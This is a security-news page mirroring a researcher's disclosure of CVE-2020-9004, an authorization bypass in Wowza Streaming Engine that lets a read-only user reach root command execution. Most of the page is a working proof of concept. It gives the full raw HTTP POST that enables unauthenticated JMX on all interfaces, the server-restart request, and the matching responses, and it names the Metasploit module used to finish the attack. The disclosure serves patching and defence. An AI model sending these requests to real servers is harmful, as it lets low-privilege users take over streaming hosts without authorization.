Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2020-9004: Disclosures/CVE-2020-9004-Authenticated Remote Authorization Bypass Leading to RCE-Wowza at master · DrunkenShells/Disclosures

A remote authenticated authorization-bypass vulnerability in Wowza Streaming Engine 4.8.0 and earlier allows any read-only user to issue requests to the administration panel in order to change functionality. For example, a read-only user may activate the Java JMX port in unauthenticated mode and execute OS commands under root privileges. This issue was resolved in Wowza Streaming Engine 4.8.5.

CVE
Open in Source
#vulnerability#web#windows#apple#js#java#rce#auth#chrome#webkit#ssl

A remote authenticated authorization bypass vulnerability in Wowza Streaming Engine 4.7.8 (build 20191105123929), allows any read-only user to issue requests to the administration panel in order to change functionality of the application. For example a read only user may activate the java JMX port in unauthenticated mode and execute OS system commands under root privileges.

Evidence

*Figure 1 - Admin has access to JMX Remote Configuration

*Figure 2 - User “user” is read-only

*Figure 3 - User “user” has no access to JMX Remote Configuration

*Figure 4 - JMX Port 8085 closed

Request to activate JMX in unauthenticated mode and listen on all interfaces:

POST /enginemanager/server/serversetup/edit_adv.htm HTTP/1.1
Host: 192.168.101.128:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3835.0 Safari/537.36
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.101.128:8088/enginemanager/Home.htm
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 3841
Cookie: JSESSIONID=E3CA656F37B024F8E2C35E4871C1EC6B; DoNotShowFTU=true; showRightRail=true; lastMangerHost=http%3A//localhost%3A8087; lastTab=Advanced; JSESSIONID=BEA4C40611950C8725FB899535496B1F
Connection: close

vhost=_defaultVHost_&advSection=JMXRemoteConfiguration&advPath=%2FRoot%2FServer&advancedTables%5BJMXRemoteConfiguration%5D%5B0%5D.uiBooleanValue=true&advancedTables%5BJMXRemoteConfiguration%5D%5B0%5D.sectionName=JMXRemoteConfiguration&advancedTables%5BJMXRemoteConfiguration%5D%5B0%5D.section=&advancedTables%5BJMXRemoteConfiguration%5D%5B0%5D.type=Boolean&advancedTables%5BJMXRemoteConfiguration%5D%5B0%5D.name=enable&advancedTables%5BJMXRemoteConfiguration%5D%5B0%5D.canRemove=false&advancedTables%5BJMXRemoteConfiguration%5D%5B1%5D.value=localhost&advancedTables%5BJMXRemoteConfiguration%5D%5B1%5D.sectionName=JMXRemoteConfiguration&advancedTables%5BJMXRemoteConfiguration%5D%5B1%5D.section=&advancedTables%5BJMXRemoteConfiguration%5D%5B1%5D.type=String&advancedTables%5BJMXRemoteConfiguration%5D%5B1%5D.name=ipAddress&advancedTables%5BJMXRemoteConfiguration%5D%5B1%5D.canRemove=false&advancedTables%5BJMXRemoteConfiguration%5D%5B2%5D.value=0.0.0.0&advancedTables%5BJMXRemoteConfiguration%5D%5B2%5D.sectionName=JMXRemoteConfiguration&advancedTables%5BJMXRemoteConfiguration%5D%5B2%5D.section=&advancedTables%5BJMXRemoteConfiguration%5D%5B2%5D.type=String&advancedTables%5BJMXRemoteConfiguration%5D%5B2%5D.name=rmiServerHostName&advancedTables%5BJMXRemoteConfiguration%5D%5B2%5D.canRemove=false&advancedTables%5BJMXRemoteConfiguration%5D%5B3%5D.value=8084&advancedTables%5BJMXRemoteConfiguration%5D%5B3%5D.sectionName=JMXRemoteConfiguration&advancedTables%5BJMXRemoteConfiguration%5D%5B3%5D.section=&advancedTables%5BJMXRemoteConfiguration%5D%5B3%5D.type=Integer&advancedTables%5BJMXRemoteConfiguration%5D%5B3%5D.name=rmiConnectionPort&advancedTables%5BJMXRemoteConfiguration%5D%5B3%5D.canRemove=false&advancedTables%5BJMXRemoteConfiguration%5D%5B4%5D.uiBooleanValue=false&advancedTables%5BJMXRemoteConfiguration%5D%5B4%5D.sectionName=JMXRemoteConfiguration&advancedTables%5BJMXRemoteConfiguration%5D%5B4%5D.section=&advancedTables%5BJMXRemoteConfiguration%5D%5B4%5D.type=Boolean&advancedTables%5BJMXRemoteConfiguration%5D%5B4%5D.name=authenticate&advancedTables%5BJMXRemoteConfi<br />guration%5D%5B4%5D.canRemove=false&advancedTables%5BJMXRemoteConfiguration%5D%5B5%5D.value=8085&advancedTables%5BJMXRemoteConfiguration%5D%5B5%5D.sectionName=JMXRemoteConfiguration&advancedTables%5BJMXRemoteConfiguration%5D%5B5%5D.section=&advancedTables%5BJMXRemoteConfiguration%5D%5B5%5D.type=Integer&advancedTables%5BJMXRemoteConfiguration%5D%5B5%5D.name=rmiRegistryPort&advancedTables%5BJMXRemoteConfiguration%5D%5B5%5D.canRemove=false&advancedTables%5BJMXRemoteConfiguration%5D%5B6%5D.value=%24%7Bcom.wowza.wms.ConfigHome%7D%2Fconf%2Fjmxremote.password&advancedTables%5BJMXRemoteConfiguration%5D%5B6%5D.sectionName=JMXRemoteConfiguration&advancedTables%5BJMXRemoteConfiguration%5D%5B6%5D.section=&advancedTables%5BJMXRemoteConfiguration%5D%5B6%5D.type=String&advancedTables%5BJMXRemoteConfiguration%5D%5B6%5D.name=passwordFile&advancedTables%5BJMXRemoteConfiguration%5D%5B6%5D.canRemove=false&advancedTables%5BJMXRemoteConfiguration%5D%5B7%5D.value=%24%7Bcom.wowza.wms.ConfigHome%7D%2Fconf%2Fjmxremote.access&advancedTables%5BJMXRemoteConfiguration%5D%5B7%5D.sectionName=JMXRemoteConfiguration&advancedTables%5BJMXRemoteConfiguration%5D%5B7%5D.section=&advancedTables%5BJMXRemoteConfiguration%5D%5B7%5D.type=String&advancedTables%5BJMXRemoteConfiguration%5D%5B7%5D.name=accessFile&advancedTables%5BJMXRemoteConfiguration%5D%5B7%5D.canRemove=false&advancedTables%5BJMXRemoteConfiguration%5D%5B8%5D.uiBooleanValue=false&advancedTables%5BJMXRemoteConfiguration%5D%5B8%5D.sectionName=JMXRemoteConfiguration&advancedTables%5BJMXRemoteConfiguration%5D%5B8%5D.section=&advancedTables%5BJMXRemoteConfiguration%5D%5B8%5D.type=Boolean&advancedTables%5BJMXRemoteConfiguration%5D%5B8%5D.name=sslSecure&advancedTables%5BJMXRemoteConfiguration%5D%5B8%5D.canRemove=false

Response:

HTTP/1.1 200 
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Fri, 14 Feb 2020 07:25:00 GMT
Connection: close
Content-Length: 138767

<div>
    <div class="row">
<div id="generic.warnings" class="alert alert-warning" style="display:none"></div>
<div class="col-md-12">
        <div class="alert alert-success" id="successMessage">
            <strong><i class="fa fa-info-circle"></i> <strong>Saved!</strong> You must restart the server for changes to take effect. <a class="btn btn-sm btn-warning" onclick="javascript:restartServerShow()"><i class="fa fa-refresh"></i>&nbsp;Restart Now</a></strong>
        </div> 
    </div>
    </div>
    <div class="row">
        <div class="col-md-9">
            <happ>
***TRUNCATED***

We have to reboot the service to apply changes.

Request:

POST /enginemanager/server/restart.htm HTTP/1.1
Host: 192.168.101.128:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3835.0 Safari/537.36
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.101.128:8088/enginemanager/Home.htm
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 446
Cookie: JSESSIONID=E3CA656F37B024F8E2C35E4871C1EC6B; DoNotShowFTU=true; showRightRail=true; lastMangerHost=http%3A//localhost%3A8087; lastTab=Advanced; JSESSIONID=BEA4C40611950C8725FB899535496B1F
Connection: close

vhost=_defaultVHost_&version=3161837623000&name=Wowza+Streaming+Engine&description=Wowza+Streaming+Engine+is+robust%2C+customizable%2C+and+scalable+server+software+that+powers+reliable+streaming+of+high-quality+video+and+audio+to+any+device%2C+anywhere.&licenseFile=ET1E4-XXXXX-XXXXX-XXXXX-XXXXX-XXXXX-BfWcpzFWMJ9&defaultStreamPrefix=mp4&statsEnabled=true&_statsEnabled=on&_rtpDataPortSharing=on&rtpDataPortSharingPort=6970&returnPage=serversetup

Response:

HTTP/1.1 200 
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Fri, 14 Feb 2020 08:57:42 GMT
Connection: close
Content-Length: 138485

<div>
    <div class="row">
<div id="generic.warnings" class="alert alert-warning" style="display:none"></div>
    <div class="col-md-12">
        <div class="alert alert-success" id="successMessage">
            <strong>Server will restart in 5 seconds <script>setTimeout(function() { $('#successMessage').fadeOut('fast'); }, 10000);</script></strong>
        </div> 
    </div>

***TRUNCATED***

*Figure 5 - JMX port 8085 opened

Using metasploit module multi/misc/java_jmx_server we obtained rce:
*Figure 6 - RCE

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE